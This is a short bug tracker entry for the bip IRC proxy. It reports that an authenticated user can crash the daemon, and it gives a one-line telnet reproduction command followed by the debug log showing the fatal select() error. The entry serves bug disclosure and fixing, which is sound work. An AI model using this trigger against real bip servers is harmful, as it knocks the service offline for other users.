Bip

Bug #432

Updated by Pierre-Louis Bonicoli almost 10 years ago

Fran found that these commands allow an authenticated to DOS bip user (with a call to stop bip daemon: @fatal@ function): 
 <pre> 
 { echo PASS bipnick:mysecretpassword:freenode; echo NICK Pilou; echo USER Pilou 0 Pilou :blah; sleep 2; } | telnet 127.0.0.1 7778 | read 
 </pre> 

 <pre> 
 15-01-2015 04:26:44 DEBUG: Trying to accept new client on 0 
 15-01-2015 04:26:44 DEBUG: New client on socket 41 ! 
 15-01-2015 04:26:44 DEBUG: fd:41 Connection established ! 
 15-01-2015 04:26:44 DEBUG: "PASS bipnick:mysecretpassword:freenode" 
 15-01-2015 04:26:44 DEBUG: "NICK Pilou" 
 15-01-2015 04:26:44 DEBUG: "USER Pilou 0 Pilou :blah" 
 15-01-2015 04:26:44 DEBUG: Connection close asked. FD:41 
 15-01-2015 04:26:44 DEBUG: A client connected 
 15-01-2015 04:26:44 FATAL: select(): Bad file descriptor 
 </pre>

Back